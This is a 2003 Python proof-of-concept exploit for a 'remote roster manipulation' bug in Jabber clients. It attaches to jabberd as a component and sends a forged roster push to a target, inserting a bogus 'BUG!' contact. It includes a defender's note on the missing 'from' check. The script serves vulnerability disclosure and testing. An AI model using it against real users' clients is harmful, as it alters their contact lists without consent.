#!/usr/bin/python
#
# Proof of concept for the "remote roster manipulation" bug of various
# Jabber clients
# (c) 2003 Jacek Konieczny
#
# Requires: http://jabberpy.sourceforge.net/
#
# What it shows: the script attaches to a jabberd as an external component
# and sends a single roster "set" IQ straight to the target's full JID.
# A client with the bug accepts it and adds the item to the victim's
# roster (client local copy only).
#
# Defender's note: a roster push is only meaningful when it comes from the
# user's own account/server.  A client should ignore any jabber:iq:roster
# "set" whose 'from' is present and is not the user's own bare JID (this
# check is spelled out in RFC 6121, section 2.1.6).  In a stanza capture
# the tell-tale is exactly that: a roster "set" addressed to a full JID
# with a foreign 'from' (here the component's own domain).
#
# To link the component with your jabberd, add a service fragment to your
# jabber.xml and restart jabberd.  source.domain must be a valid DNS
# hostname and point to your jabberd.  The XML markup of the fragment was
# lost from this copy of the file; the values it carried were:
#
#   source.domain   (the component's host name)
#   127.0.0.1       (address the component connects to)
#   secret          (shared secret)
#   6969            (port)
#
# Usage:
#   ./exploit.py target-full-jid
#
# eg.:
#   ./exploit.py someone@jabber.nowhere/Home

import jabber
import xmlstream
import sys


def iq_handler(con, iq):
    """Write every IQ stanza delivered to this component to stdout."""
    sys.stdout.write("Got IQ: " + str(iq.asNode()) + "\n")


def _marker_item():
    """Build the <item/> carried by the roster push.

    The entry is a visibly bogus marker (jid, name and group all say "bug"),
    so an affected client is easy to recognise by looking at its roster.
    """
    entry = xmlstream.Node("item")
    entry.putAttr("jid", "bug@bug.nowhere")
    entry.putAttr("name", "BUG! BUG! BUG!")
    entry.putAttr("subscription", "none")

    bucket = xmlstream.Node("group")
    bucket.putData("Bugs")
    entry.insertNode(bucket)
    return entry


# Address the component speaks as; it has to match the host name configured
# for the component in jabber.xml.
me = "source.domain"

# Host, port and secret below mirror the values from the jabber.xml fragment
# described in the header.
con = jabber.Component(host='127.0.0.1', debug=0, port=6969, log='log')
con.connect()
con.process(1)  # presumably handles the stream opening before auth -- confirm
con.auth('secret')
con.setIqHandler(iq_handler)

try:
    # The target is read inside the try block, as in the original; a missing
    # argument raises IndexError, which the handler below does not catch.
    iq = jabber.Iq(to=sys.argv[1], type="set")
    # A 'from' that is not the target's own account is what a correct
    # client must reject for a roster "set".
    iq.setFrom(me)
    query = iq.setQuery('jabber:iq:roster')
    query.insertNode(_marker_item())
    con.send(iq)

    # Keep servicing the stream so replies reach iq_handler; Ctrl-C stops it.
    while True:
        con.process(10)
except KeyboardInterrupt:
    con.disconnect()